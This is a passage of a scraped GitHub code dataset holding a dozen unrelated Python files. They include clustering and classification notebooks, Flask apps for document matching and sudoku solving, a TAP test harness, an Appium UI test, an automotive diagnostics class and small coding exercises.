\n)\nax.set_xlabel('pca-one')\nax.set_ylabel('pca-two')\nax.set_zlabel('pca-three')\nplt.show()\n\n\n# In[41]:\n\n\n# Normalizing Dataset\nfrom sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler()\npca_df_normal = scaler.fit_transform(pca_df)\nprint(pca_df_normal)\n\n\n# In[42]:\n\n\n# Creating clusters\nfrom sklearn.cluster import AgglomerativeClustering\nH_clusters=AgglomerativeClustering(n_clusters=3,affinity='euclidean',linkage='ward')\nH_clusters\n\n\n# In[43]:\n\n\ny=pd.DataFrame(H_clusters.fit_predict(pca_df_normal),columns=['clustersid_H'])\ny['clustersid_H'].value_counts()\n\n\n# In[45]:\n\n\n# Performing K-MEANS Clustering\nfrom sklearn.cluster import KMeans\n\n\n# In[46]:\n\n\nwcss = []\nfor i in range(1, 11):\n kmeans = 
KMeans(n_clusters=i,random_state=0)\n kmeans.fit(pca_df_normal)\n wcss.append(kmeans.inertia_)\n \nplt.plot(range(1, 11), wcss)\nplt.title('Elbow Method')\nplt.xlabel('Number of clusters')\nplt.ylabel('WCSS')\nplt.show()\n\n\n# In[47]:\n\n\n#Build Cluster algorithm\nKM_clusters = KMeans(3, random_state=42)\nKM_clusters.fit(pca_df_normal)\n\n\n# In[48]:\n\n\ny=pd.DataFrame(KM_clusters.fit_predict(pca_df_normal),columns=['clusterid_Kmeans'])\ny['clusterid_Kmeans'].value_counts()\n\n\n# In[49]:\n\n\n# Preparing Actual Vs. Predicted Clusering Data\nwine_class = df['class']\nwine_class = pd.Series(wine_class)\n\n\n# In[50]:\n\n\nclustersid_HC = H_clusters.labels_\nclustersid_HC = pd.Series(clustersid_HC)\n\n\n# In[51]:\n\n\nclusterid_Kmeans = KM_clusters.labels_\nclusterid_Kmeans = pd.Series(clusterid_Kmeans)\n\n\n# In[52]:\n\n\npred_df = pd.concat([wine_class, clustersid_HC, clusterid_Kmeans],axis = 1)\npred_df\n\n","repo_name":"Ankush23121999/Data-Science-Assignments","sub_path":"PCA .py","file_name":"PCA .py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40624099814","text":"from flask import (\n Blueprint, flash, g, redirect, render_template, request, url_for\n)\nfrom werkzeug.exceptions import abort\n\nfrom bryophyta.auth import login_required\nfrom bryophyta.db import get_db\nfrom bryophyta.logic.document import Document\nfrom bryophyta.logic.dropbox import Dropbox\n\nbp = Blueprint('dropbox', __name__)\n\n\n@bp.route('/')\ndef index():\n db = get_db()\n documents = db.execute(\n 'SELECT d.id, title, body, created, author_id, username'\n ' FROM document d JOIN user u ON d.author_id = u.id'\n ' ORDER BY created DESC'\n ).fetchall()\n return render_template('dropbox/index.html', documents=documents)\n\n\n@bp.route('/create', methods=('GET', 'POST'))\n@login_required\ndef create():\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n error = None\n\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n db = get_db()\n db.execute(\n 'INSERT INTO document (title, body, author_id)'\n ' VALUES (?, ?, ?)',\n (title, body, g.user['id'])\n )\n db.commit()\n return redirect(url_for('dropbox.index'))\n\n return render_template('dropbox/create.html')\n\ndef get_document(id, check_author=True):\n document = get_db().execute(\n 'SELECT d.id, title, body, created, author_id, username'\n ' FROM document d JOIN user u ON d.author_id = u.id'\n ' WHERE d.id = ?',\n (id,)\n ).fetchone()\n\n if document is None:\n abort(404, f\"Document id {id} doesn't exist.\")\n\n if check_author and document['author_id'] != g.user['id']:\n abort(403)\n\n return document\n\n\n@bp.route('/<int:id>/update', methods=('GET', 'POST'))\n@login_required\ndef update(id):\n document = get_document(id)\n\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n error = None\n\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n db = get_db()\n db.execute(\n 'UPDATE document SET title = ?, body = ?'\n ' WHERE id = ?',\n (title, body, id)\n )\n db.commit()\n return redirect(url_for('dropbox.index'))\n\n return render_template('dropbox/update.html', document=document)\n\n\n@bp.route('/<int:id>/delete', methods=('POST',))\n@login_required\ndef delete(id):\n get_document(id)\n db = get_db()\n db.execute('DELETE FROM document WHERE id = ?', (id,))\n db.commit()\n return 
redirect(url_for('dropbox.index'))\n\n\n@bp.route('/calculate', methods=('GET', 'POST'))\n@login_required\ndef calculate():\n if request.method == 'POST':\n return redirect(url_for('dropbox.index'))\n\n db = get_db()\n documents = db.execute(\n 'SELECT d.id, title, body, created, author_id, username'\n ' FROM document d JOIN user u ON d.author_id = u.id'\n ' ORDER BY created DESC'\n ).fetchall()\n\n docs = [Document(d['id'], d['title'], d['body']) for d in documents]\n dropbox = Dropbox(docs)\n dropbox.calculate()\n documents = dropbox.documents\n matches = dropbox.list_matches()\n\n return render_template('dropbox/report.html', documents=documents, matches=matches)\n","repo_name":"risperss/bryophyta","sub_path":"bryophyta/dropbox.py","file_name":"dropbox.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"18409434042","text":"from confapp import conf\nfrom pyforms.controls import ControlCheckBox\nfrom pyforms.controls import ControlAutoComplete\nfrom pyforms_web.widgets.django import ModelAdminWidget\n\nfrom research.models import Publication\n\nfrom people.models import Person, Group\n\nfrom .publication_form import PublicationFormWidget\n\n\nclass PublicationsListWidget(ModelAdminWidget):\n \"\"\"\n \"\"\"\n UID = 'publications'\n TITLE = 'Publications'\n\n MODEL = Publication\n\n ###########################################################################\n # ORQUESTRA CONFIGURATION\n\n LAYOUT_POSITION = conf.ORQUESTRA_HOME_FULL\n ORQUESTRA_MENU = 'left'\n ORQUESTRA_MENU_ORDER = 20\n ORQUESTRA_MENU_ICON = 'newspaper outline yellow'\n # AUTHORIZED_GROUPS = ['superuser']\n ###########################################################################\n\n USE_DETAILS_TO_EDIT = False\n\n LIST_DISPLAY = [\n 'publication_title',\n 'journal',\n 'publication_year',\n 'publication_authors',\n ]\n\n SEARCH_FIELDS = [\n 'publication_title__icontains',\n 'publication_abstract__icontains',\n 'publication_authors__icontains',\n 'authors__full_name__icontains',\n 'publication_doi__icontains'\n ]\n\n LIST_FILTER = [\n 'pubtype',\n 'publication_year',\n 'journal',\n 'publication_keypub',\n ]\n\n EDITFORM_CLASS = PublicationFormWidget\n\n def __init__(self, *args, **kwargs):\n\n self._show_all_filter = ControlCheckBox(\n 'Show only my publications',\n default=True,\n label_visible=True,\n changed_event=self.populate_list\n )\n\n self._researchgroups = ControlAutoComplete(\n 'Groups', \n queryset=Group.objects.all(), \n multiple=True,\n changed_event=self.populate_list\n )\n\n self._people = ControlAutoComplete(\n 'People', \n queryset=Person.objects.all(), \n multiple=True,\n changed_event=self.populate_list\n )\n\n super().__init__(*args, **kwargs)\n\n self._add_btn.label_visible=True\n\n\n\n def get_toolbar_buttons(self, *args, **kwargs):\n add_btn = super().get_toolbar_buttons(*args, **kwargs)\n return (add_btn, '_show_all_filter', '_people','_researchgroups')\n\n def get_queryset(self, request, qs):\n \n if self._show_all_filter.value:\n qs = qs.is_author(user=request.user)\n\n if self._researchgroups.value:\n qs = qs.filter_research_groups(self._researchgroups.value)\n\n if self._people.value:\n qs = qs.filter_people(self._people.value)\n\n return 
qs\n","repo_name":"research-core/core-research","sub_path":"research/apps/publications/publications.py","file_name":"publications.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71633894664","text":"#node:\n# header\n # - child nodes\n # - metadata\n# 0+ child nodes\n# 1+ metadata\n\nwith open(r'aoc_18_08.txt', 'r') as f:\n raw_input = f.read()\n\n#raw_input = \"2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2\"\ninputs = [int(x) for x in raw_input.strip().split(\" \")]\nmetadata = 0\n\ndef node(inputs, positie):\n global metadata\n this_node = {'amount_of_children': 0, 'amount_of_metadata': 0,\n 'children': [], 'meta-data': [], 'value': 0}\n this_node['amount_of_children'] = inputs[positie]\n positie += 1\n this_node['amount_of_metadata'] = inputs[positie]\n positie += 1\n for nr in range(this_node['amount_of_children']):\n new_position, child = node(inputs, positie)\n positie = new_position\n this_node['children'].append(child)\n for nr in range(this_node['amount_of_metadata']):\n this_node['meta-data'].append(inputs[positie])\n metadata += inputs[positie]\n positie += 1\n if this_node['amount_of_children'] == 0:\n this_node['value'] = sum(this_node['meta-data'])\n else:\n for meta in this_node['meta-data']:\n try:\n this_node['value'] += this_node['children'][meta-1]['value']\n except IndexError:\n continue\n return positie, this_node\n\n# print(node(inputs, 0))\nprint(node(inputs, 0)[1]['value'])\n","repo_name":"Jazende/AdventOfCode","sub_path":"aoc18/aoc_18_08.py","file_name":"aoc_18_08.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2005286891","text":"#Given a list of strings, return all pairs of strings that can make a palindrome. 
\n\n\ndef pal(lis):\n\n\tpals = []\n\n\t#base case empty\n\n\tif len(lis) <=1:\n\t\treturn 0\n\t\n\n\telse: # real deal\n\t\n\t\tfor i in range(len(lis)):\n\n\t\t\tfor j in range(len(lis)):\n\t\t\t\t\n\t\t\t\t#if (true): \n\n\t\t\t\tif (lis[i] + lis[j] == lis[j] + lis[i]):\n\n\t\t\t\t\tpals.append( lis[i] + lis[j] )\n\n\n\tprint (pals)\n\t\n\n\npal([\"abc\", \"cba\"])\n","repo_name":"NatuMyers/pythonpractice","sub_path":"pal.py","file_name":"pal.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27646980128","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.model_selection import RepeatedKFold\nfrom sklearn.preprocessing import StandardScaler\n\n# conjunto de dados de cancer de mama\nbreast = load_breast_cancer()\n\n# dataframe para visualizar os dados\nbreast_data = pd.DataFrame(breast.data, columns=breast.feature_names)\nbreast_data.describe().transpose()\n\n# criar grafico com searborn e matplotlib\nplt.figure(figsize=(8, 8))\natrib_medidas = breast_data.columns[1:11]\nm_corr = breast_data[atrib_medidas].corr()\nsns.heatmap(m_corr, cmap='Blues', annot=True, square=True)\n\n# Criar um DataFrame para os rótulos e associá-los com as classes.\n\nlabels = pd.DataFrame(breast.target, columns=['Tipo de cancêr'])\nlabels_class = labels['Tipo de cancêr'].map({0: 'maligno', 1: 'binigno'})\n\n# A seguir, iremos observar a distribuição dos valores de classe no gráfico de barras:\nplt.figure(figsize=(6, 6))\nplt.tick_params(labelbottom=False)\nsns.countplot(data=labels, x='Tipo de cancêr', hue=labels_class, palette=sns.color_palette(\"RdBu\", 2))\n\n# vamos selecionar os últimos 3 atributos do conjunto de dados e plotar os relacionamentos emparelhados do conjunto de dados\n\nbreast_data[\"Tipo de cancêr\"] = labels\natrib_3ultimos = breast_data.columns[27:31]\nplt.figure(figsize=(6, 6))\nsns.pairplot(breast_data[atrib_3ultimos], hue=\"Tipo de cancêr\", palette=\"husl\", markers=['o', 'd'])\n\n# realizar a normalização\n# método de transformação nos dados selecionados (excetoo atributo-alvo):\n\nstdScaler = StandardScaler()\natributos_treinamento = breast_data.columns[0:30]\nbreast_data[atributos_treinamento] = stdScaler.fit_transform(breast_data[atributos_treinamento])\n\n# boas práticas dizem que você deve empregar a validação cruzada com 10 subconjuntos e 10 repetições na avaliação do modelo.\nrkf = RepeatedKFold(n_splits=10, n_repeats=10, random_state=42)\n# Armazena os resultados de todas as iterações\naccuracies = []\nprecisions = []\nrecalls = []\n# verificar e experimentar os algoritmos\n\nfor train_idx, test_idx in rkf.split(breast_data):\n # Divide o conjunto em treinamento/teste\n X_train, X_test = breast_data.iloc[train_idx, :-1], breast_data.iloc[test_idx, :-1]\n y_train, y_test = breast_data.iloc[train_idx, -1], breast_data.iloc[test_idx, -1]\n\n model = LogisticRegression()\n model.fit(X_train, y_train)\n\n # prediz os rótulos no conjunto de teste\n y_pred = model.predict(X_test)\n\n # Calcula a acurácia, a precisão e a sensibiidade\n acc = accuracy_score(y_test, y_pred)\n accuracies.append(acc)\n\n prec = precision_score(y_test, y_pred)\n precisions.append(prec)\n\n rec = 
recall_score(y_test, y_pred)\n recalls.append(rec)\n\nprint(\"Regressão logistica\")\n\nacuracia = \"The acuracia is {:.3f} +- {:.3f} percent.\"\nprint(acuracia.format(np.mean(accuracies), np.std(accuracies)))\n\nprecisao = \"The precision is {:.3f} +- {:.3f} percent.\"\nprint(precisao.format(np.mean(precisions), np.std(precisions)))\n\nsensibilidade = \"The recall is {:.3f} +- {:.3f} percent.\\n\"\nprint(sensibilidade.format(np.mean(recalls), np.std(recalls)))\n\n# Com os hiperparâmetros encontrados e definidos no modelo de Regressão Logística,\n\nmodel = LogisticRegression(C=0.052, penalty='l2', solver='liblinear')\n\nmodel.fit(X_train, y_train)\n# prediz os rótulos no conjunto de teste\ny_pred = model.predict(X_test)\n\n# Calcula a acurácia, a precisão e a sensibiidade\nacc = accuracy_score(y_test, y_pred)\naccuracies.append(acc)\n\nprec = precision_score(y_test, y_pred)\nprecisions.append(prec)\n\nrec = recall_score(y_test, y_pred)\nrecalls.append(rec)\n\nprint(\"Regressão logistica otimizada\")\n\nacuracia = \"The acuracia is {:.3f} +- {:.3f} percent.\"\nprint(acuracia.format(np.mean(accuracies), np.std(accuracies)))\n\nprecisao = \"The precision is {:.3f} +- {:.3f} percent.\"\nprint(precisao.format(np.mean(precisions), np.std(precisions)))\n\nsensibilidade = \"The recall is {:.3f} +- {:.3f} percent.\"\nprint(sensibilidade.format(np.mean(recalls), np.std(recalls)))\n","repo_name":"vitomc22/my-scikit-learn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30007081211","text":"#!/usr/bin/env python3.6\n\"\"\"\n Runs the unit test suite specified by the .tst files.\n\"\"\"\n\nimport sys\nimport os\nimport subprocess\nimport signal\nimport tempfile\nimport re\nimport shutil\nimport io\nimport getopt\nimport json\nfrom collections import namedtuple\n\ndef eprint(*args, **kwargs):\n print(*args, file=sys.stderr, flush=True, **kwargs)\n\ncolorAvailable = False\ntry:\n from termcolor import colored\n colorAvailable = True\nexcept:\n pass\n\n# status can be \"pass\" \"fail\" \"skip\" or None (for a message)\nTestResult = namedtuple('TestResult', ['status', 'testnum', 'message'])\n\n# get a mapping between signal numbers and names https://stackoverflow.com/a/2549950\nsigDict = dict((k, v) for v, k in reversed(sorted(signal.__dict__.items()))\n if v.startswith('SIG') and not v.startswith('SIG_'))\n\nistty = sys.stderr.isatty()\n\ndef colorize(string, color):\n if istty and colorAvailable:\n return colored(string, color)\n else:\n return string\n\ndef tapParser(stream, outfile):\n numTestsRe = \"^(\\d+)\\.\\.(\\d+)\"\n okRe = \"^ok\\s+(\\d+)?\\s*?(.*)\"\n notOkRe = \"^not ok\\s+(\\d+)?\\s*?(.*)\"\n directiveRe = \"^#\"\n\n numTestsComp = re.compile(numTestsRe)\n okComp = re.compile(okRe)\n notOkComp = re.compile(notOkRe)\n directiveComp = re.compile(directiveRe)\n\n testNum = 0\n numTests = None\n\n for line in stream:\n outfile.write(line)\n\n result = None\n\n # XXX the below pattern runs the regex twice unnecessarily\n if numTestsComp.match(line):\n m = numTestsComp.match(line)\n groups = m.groups()\n numTests = groups[1]\n if okComp.match(line):\n m = okComp.match(line)\n groups = m.groups()\n message = groups[1]\n if \"# skip\" in message.lower():\n result = TestResult(status=\"skip\", message=message, testnum=testNum)\n else:\n result = TestResult(status=\"pass\", message=message, testnum=testNum)\n testNum += 1\n elif notOkComp.match(line):\n m = 
notOkComp.match(line)\n groups = m.groups()\n result = TestResult(status=\"fail\", message=groups[1], testnum=testNum)\n testNum += 1\n elif directiveComp.match(line):\n m = directiveComp.match(line)\n result = TestResult(status=None, message=line, testnum=None)\n\n if result:\n yield result\n\nclass TestRunner():\n def __init__(self, dryRun=False, group='all'):\n self.topDir = \".\"\n self.dryRun = dryRun\n self.group = group\n self.curDir = os.path.abspath(self.topDir)\n self.tests = []\n self.collectTests(self.curDir)\n return\n\n def runSuite(self):\n eprint(\"TEST_HARNESS_START_PROCESS_TESTS\")\n rtn = self.processTests(self.topDir)\n eprint(\"TEST_HARNESS_END_PROCESS_TESTS\")\n return rtn\n\n def collectTests(self, dirPath):\n \"\"\"Consumes a .tst file and adds all tests discovered\n to self.tests if they match the specified group or the\n group is 'all'\"\"\"\n\n self.curDir = dirPath\n testPath = os.path.join(dirPath, \"sanity.tst\")\n with open(testPath, \"r\") as f:\n try:\n tests, subdirs = self.parseConfig(f)\n if self.group == 'all':\n self.tests += tests\n else:\n self.tests += [t for t in tests if self.group == t['group']]\n except:\n eprint(\"Failed to parse {}\".format(testPath))\n raise\n\n for d in subdirs:\n newDir = os.path.join(dirPath, d)\n if not self.collectTests(newDir):\n return False\n\n return True\n\n def processTests(self, dirPath):\n \"\"\"Executes all enabled tests\n Returns True on success; False on some failure\n \"\"\"\n\n for test in self.tests:\n if test.get(\"enabled\", True):\n if not self.executeTest(test):\n return False\n else:\n self.skipTest(test[\"name\"], \"\", \"Disabled in sanity.tst\")\n\n return True\n\n def _invokeTapTest(self, test):\n \"\"\"Returns True for a passed test\"\"\"\n command = test[\"command\"]\n with tempfile.NamedTemporaryFile('w+t', encoding=\"utf-8\") as errfile, tempfile.NamedTemporaryFile('w+t', buffering=1, encoding=\"utf-8\") as outfile:\n pasteableCommand = '(cd \"{}\" && {})'.format(\n self.curDir,\n \" \".join(command)\n )\n eprint(pasteableCommand)\n eprint(\"stderr -> {}\".format(errfile.name))\n failingResult = None\n pr = subprocess.Popen(command,\n cwd=self.curDir,\n stdout=subprocess.PIPE,\n stderr=errfile,\n bufsize=1,\n encoding=\"utf-8\")\n for testResult in tapParser(pr.stdout, outfile):\n self.printTestResult(test, testResult)\n if testResult.status == \"fail\":\n failingResult = testResult\n\n pr.communicate()\n\n failed = bool(failingResult or pr.returncode != 0)\n if pr.returncode != 0:\n if pr.returncode < 0:\n signalName = sigDict[-pr.returncode]\n message = \"failed with {}\".format(signalName)\n else:\n message = \"returned {}\".format(pr.returncode)\n self.failTest(test[\"name\"], \"\", message)\n\n if failed:\n outfile.seek(0)\n errfile.seek(0)\n\n eprint(\"{} stdout:\".format(test[\"name\"]))\n shutil.copyfileobj(outfile, sys.stderr)\n eprint(\"\\n{}\\n\".format(\"-*\" * 40))\n eprint(\"{} stderr:\".format(test[\"name\"]))\n shutil.copyfileobj(errfile, sys.stderr)\n eprint(\"\\n{}\\n\".format(\"-*\" * 40))\n return False\n return True\n\n def _invokeNonTapTest(self, test):\n res = subprocess.run(test[\"command\"], cwd=self.curDir)\n success = res.returncode == 0\n if not success:\n eprint(\"Test '{}' failed\".format(test[\"name\"]))\n return success\n\n def executeTest(self, test):\n \"\"\"Returns True for a passed test\"\"\"\n\n self.curDir = test[\"path\"]\n if test[\"tap\"]:\n return self._invokeTapTest(test)\n else:\n return self._invokeNonTapTest(test)\n\n def printTestResult(self, test, 
result):\n if result.status == \"pass\":\n self.passTest(test[\"name\"], result.testnum, result.message)\n elif result.status == \"fail\":\n self.failTest(test[\"name\"], result.testnum, result.message)\n elif result.status == \"skip\":\n self.skipTest(test[\"name\"], result.testnum, result.message)\n elif result.status is None:\n eprint(result.message)\n\n def skipTest(self, testname, testnum, message):\n status = \"SKIP\"\n eprint(\"{}: {} {}{}\".format(\n colorize(status, \"yellow\"),\n testname,\n testnum,\n message))\n\n def passTest(self, testname, testnum, message):\n status = \"PASS\"\n eprint(\"{}: {} {}{}\".format(\n colorize(status, \"green\"),\n testname,\n testnum,\n message))\n\n def failTest(self, testname, testnum, message):\n status = \"FAIL\"\n eprint(\"{}: {} {}{}\".format(\n colorize(status, \"red\"),\n testname,\n testnum,\n message))\n\n def listGroups(self):\n eprint(\"TEST_HARNESS_START_LIST_GROUPS\")\n print(' '.join(set([t['group'] for t in self.tests])))\n eprint(\"TEST_HARNESS_END_LIST_GROUPS\")\n return True\n\n def listTests(self):\n eprint(\"TEST_HARNESS_START_LIST_TESTS\")\n for t in self.tests:\n print(t)\n eprint(\"TEST_HARNESS_END_LIST_TESTS\")\n return True\n\n def getGroupCmd(self, ts):\n \"\"\" Returns group name and command. the group is\n stripped of the leading @\"\"\"\n if ts[0].startswith(\"@\"):\n return (ts[0][1:], ts[1:])\n else:\n return ('default',ts[0:])\n\n def parseConfig(self, cfg):\n tests = []\n subdirs = []\n for line in cfg:\n if not line or line.startswith(\"#\"):\n continue\n tokens = line.split()\n cmd = tokens[0]\n if cmd == \"addtaptest\":\n test = {}\n group, testCmd = self.getGroupCmd(tokens[1:])\n test[\"name\"] = os.path.basename(testCmd[0])\n test[\"command\"] = testCmd\n test[\"group\"] = group\n test[\"path\"] = self.curDir\n test[\"tap\"] = True\n tests.append(test)\n elif cmd == \"addtest\":\n test = {}\n group, testCmd = self.getGroupCmd(tokens[1:])\n test[\"name\"] = os.path.basename(testCmd[0])\n test[\"command\"] = testCmd\n test[\"group\"] = group\n test[\"path\"] = self.curDir\n test[\"tap\"] = False\n tests.append(test)\n elif cmd == \"addskip\":\n test = {}\n group, testCmd = self.getGroupCmd(tokens[1:])\n test[\"name\"] = os.path.basename(testCmd)\n test[\"command\"] = testCmd\n test[\"enabled\"] = False\n test[\"path\"] = self.curDir\n test[\"group\"] = group\n tests.append(test)\n elif cmd == \"subdir\":\n subdir = tokens[1]\n subdirs.append(subdir)\n else:\n raise ValueError(\"test command {} not recognized\".format(cmd))\n\n return tests, subdirs\n\ndef main(argv):\n # fix up any http proxy which may be set up\n # This sometimes intercepts http thrift APIs, returning an error message.\n os.environ[\"http_proxy\"] = \"\"\n os.environ[\"https_proxy\"] = \"\"\n group = os.environ.get('SANITY_GROUP', 'all')\n dryRun = False\n groupNames = False\n ret = 0\n\n try:\n opts, args = getopt.getopt(argv[1:],\"hlng:\")\n except getopt.GetoptError:\n print ('%s -hnj' % argv[0] )\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print ('test-harness.py' )\n print (' -h help')\n print (' -l list all tests or only those selected by -g')\n print (' -n outputs all group names')\n print (' -g <group> includes only tests labeled @group (note the @)')\n return 0\n elif opt == '-g':\n group = arg\n elif opt == '-l':\n dryRun = True\n elif opt == '-n':\n groupNames = True\n\n runner = TestRunner(group=group)\n\n if dryRun:\n ret = runner.listTests()\n elif groupNames:\n ret = runner.listGroups()\n else:\n ret = 
runner.runSuite()\n\n if ret:\n return 0\n else:\n return 1\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","repo_name":"varlogtim/xcalar","sub_path":"bin/test-harness.py","file_name":"test-harness.py","file_ext":"py","file_size_in_byte":11270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"40076577127","text":"# SPDX-License-Identifier: MIT\nimport abc\nfrom dataclasses import dataclass\nfrom typing import Literal\n\nfrom ..odxtypes import AtomicOdxType, DataType\n\nCompuMethodCategory = Literal[\n \"IDENTICAL\",\n \"LINEAR\",\n \"SCALE-LINEAR\",\n \"TAB-INTP\",\n \"TEXTTABLE\",\n]\n\n\n@dataclass\nclass CompuMethod(abc.ABC):\n internal_type: DataType\n physical_type: DataType\n\n @property\n @abc.abstractmethod\n def category(self) -> CompuMethodCategory:\n pass\n\n def convert_physical_to_internal(self, physical_value: AtomicOdxType) -> AtomicOdxType:\n raise NotImplementedError()\n\n def convert_internal_to_physical(self, internal_value: AtomicOdxType) -> AtomicOdxType:\n raise NotImplementedError()\n\n def is_valid_physical_value(self, physical_value: AtomicOdxType) -> bool:\n raise NotImplementedError()\n\n def is_valid_internal_value(self, internal_value: AtomicOdxType) -> bool:\n raise NotImplementedError()\n","repo_name":"mercedes-benz/odxtools","sub_path":"odxtools/compumethods/compumethod.py","file_name":"compumethod.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"81"} +{"seq_id":"44345674463","text":"import os,sys\nfrom multiprocessing import Process\nfrom .majortomo.broker import Broker\n\ndef start_broker(broker_bind_address):\n\n def start_broker_process(bindpoint):\n broker = Broker(bind=bindpoint)\n broker.run()\n\n pbroker = Process(target=start_broker_process,\n args=(broker_bind_address,))\n pbroker.daemon = True\n pbroker.start()\n\n return pbroker\n","repo_name":"LArbys/ublarcvserver","sub_path":"python/ublarcvserver/start_broker.py","file_name":"start_broker.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"9346692238","text":"#abby\nimport pytest\nfrom appium import webdriver\nfrom appium.webdriver.common.mobileby import MobileBy\n\n\n\nclass TestSearch:\n def setup_class(self):\n\n caps={\n \"platformName\": \"Android\",\n \"platformVersion\": \"5.1.1\",\n \"deviceName\": \"Android Emulator\",\n \"appPackage\": \"com.xueqiu.android\",\n \"appActivity\": \".view.WelcomeActivityAlias\",\n \"autoGrantPermissions\": \"true\",\n \"noReset\": \"true\"\n }\n self.driver=webdriver.Remote('http://127.0.0.1:4723/wd/hub',caps)\n self.driver.implicitly_wait(10)\n\n def teardown_class(self):\n self.driver.quit()\n\n def teardown(self):\n self.driver.find_element(MobileBy.ID,\"com.xueqiu.android:id/action_close\").click()\n @pytest.mark.parametrize('searchkey,search_result',[('alibaba','阿里巴巴'),('jd','京东')])\n def test_search(self,searchkey,search_result):\n el2 = self.driver.find_element(MobileBy.ID,\"com.xueqiu.android:id/tv_search\").click()\n el3 = self.driver.find_element(MobileBy.ID,\"com.xueqiu.android:id/search_input_text\").send_keys(searchkey)\n # 点击搜索的下拉框\n el4 = self.driver.find_element(MobileBy.XPATH,f\"//*[@text='{search_result}']\")\n el4.click()\n el5 = self.driver.find_elements(MobileBy.XPATH,f\"//*[@text='{search_result}']/../../..//*[@text='加自选']\")\n\n if len(el5)>0:\n\n el5[0].click()\n 
else:\n pass\n\n\n","repo_name":"abbygo/Homework","sub_path":"appium_qiyeweixin/testcases/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74308601223","text":"# %%\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom IPython.display import display\npd.set_option(\"display.max_columns\", None)\n# %%\ndf_orig = (\n pd.read_csv(\n \"../data/trajectory_data.csv\", \n )\n .assign(\n SM_DATE = lambda x: x['SM_DATE'].astype(\"datetime64\"), \n last_visit = lambda x: x.groupby(['HPCID'])['SM_DATE'].transform(max), \n follow_up = lambda x: (x['last_visit'] - x['SM_DATE']) / np.timedelta64(1, 'M')\n )\n)\n\n# %%\ndf_bapwv = df_orig.query(\"baPWV.notnull()\", engine='python').reset_index(drop=True)\n\ndisplay(df_bapwv[\"HPCID\"].value_counts().value_counts())\n# %%\ndf_abi = df_orig.query(\"ABI.notnull()\", engine='python').reset_index(drop=True)\n\ndisplay(df_abi[\"HPCID\"].value_counts().value_counts())\n\n# %%\ndf_imt = df_orig.query(\"mean_IMT.notnull()\", engine='python').reset_index(drop=True)\n\ndisplay(df_imt[\"HPCID\"].value_counts().value_counts())\n# %%\n","repo_name":"Jovinus/Trajectory_Fit","sub_path":"src/basic_analysis.py","file_name":"basic_analysis.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7045706757","text":"import json\r\nimport os\r\n\r\nfrom flask import Flask, request, render_template, Response\r\n\r\nfrom sudoku import solve as sudoku_solve, InvalidBoardException\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/')\r\ndef hello_world():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/solve', methods=['POST'])\r\ndef solve():\r\n board = request.values.get('board')\r\n\r\n if not board:\r\n return 'No board parameter found', 403\r\n\r\n board = json.loads(board)\r\n\r\n try:\r\n result = sudoku_solve(board)\r\n except InvalidBoardException as e:\r\n return e.message, 403\r\n\r\n return Response(\r\n response=json.dumps(result),\r\n mimetype='application/json; utf-8',\r\n )\r\n\r\nif __name__ == '__main__':\r\n PORT = os.environ.get('PORT')\r\n app.run(debug=PORT is None, host='0.0.0.0' if PORT is not None else None, port=PORT)\r\n","repo_name":"dhedegaard/sudokuweb","sub_path":"sudokuweb.py","file_name":"sudokuweb.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"22651553367","text":"# In this assignment you will write a Python program somewhat similar to\n# [http://www.py4e.com/code3/json2.py]. 
